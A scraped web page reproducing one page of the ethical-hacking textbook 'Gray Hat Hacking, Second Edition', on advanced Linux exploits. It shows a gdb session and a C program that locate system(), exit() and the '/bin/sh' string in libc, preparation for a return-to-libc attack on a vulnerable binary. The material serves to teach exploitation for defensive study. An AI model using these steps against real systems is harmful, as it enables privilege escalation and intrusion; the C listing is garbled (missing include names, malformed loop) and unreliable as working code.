PARTS:
Part 14
Part 15
Part 16
Part 17
Part 18
Part 19
Part 20
Part 21
Part 22
Part 23
Part 24
Part 25
Part 26
Part 27
Part 28
Part 29
Part 30
Part 31
Part 32
Part 33
SEARCH
0-9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Prev | Current Page 359 | Next

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

When the program halts on the breakpoint,
print the locations of the glibc function called system().
BT book $ gdb -q vuln2
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483aa
(gdb) r
Starting program: /mnt/sda1/book/book/vuln2
Breakpoint 1, 0x080483aa in main ()
(gdb) p system
$1 = {} 0xb7ed86e0
(gdb) q
The program is running. Exit anyway? (y or n) y
BT book $
Gray Hat Hacking: The Ethical Hacker??™s Handbook
186
Chapter 8: Advanced Linux Exploits
187
PART III
Another cool way to get the locations of functions and strings in a binary is by searching
the binary with a custom program as follows:
BT book $ cat search.c
/* Simple search routine, based on Solar Designer's lpr exploit. */
#include
#include
#include
#include
int step;
jmp_buf env;
void fault() {
if (step<0)
longjmp(env,1);
else {
printf("Can't find /bin/sh in libc, use env instead...\n");
exit(1);
}
}
int main(int argc, char **argv) {
void *handle;
int *sysaddr, *exitaddr;
long shell;
char examp[512];
char *args[3];
char *envs[1];
long *lp;
handle=dlopen(NULL,RTLD_LOCAL);
*(void **)(&sysaddr)=dlsym(handle,"system");
sysaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address
printf("system() found at %08x\n",sysaddr);
*(void **)(&exitaddr)=dlsym(handle,"exit");
exitaddr+=4096; // using pointer math 4096*4=16384=0x4000=base address
printf("exit() found at %08x\n",exitaddr);
// Now search for /bin/sh using Solar Designer's approach
if (setjmp(env))
step=1;
else
step=-1;
shell=(int)sysaddr;
signal(SIGSEGV,fault);
do
while (memcmp((void *)shell, "/bin/sh", 8)) shell+=step;
//check for null byte
while (!(shell & 0xff) || !(shell & 0xff00) || !(shell & 0xff0000)
|| !(shell & 0xff000000));
printf("\"/bin/sh\" found at %08x\n",shell+16384); // 16384=0x4000=base addr
}
Gray Hat Hacking: The Ethical Hacker??™s Handbook
188
The preceding program uses the dlopen and dlsym functions to handle objects and symbols
located in the binary.


Pages:
347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371
The Art of Agile Development (page 35) Absalom's Hair (page 26) Absolute Surrender and Other Addresses (page 15)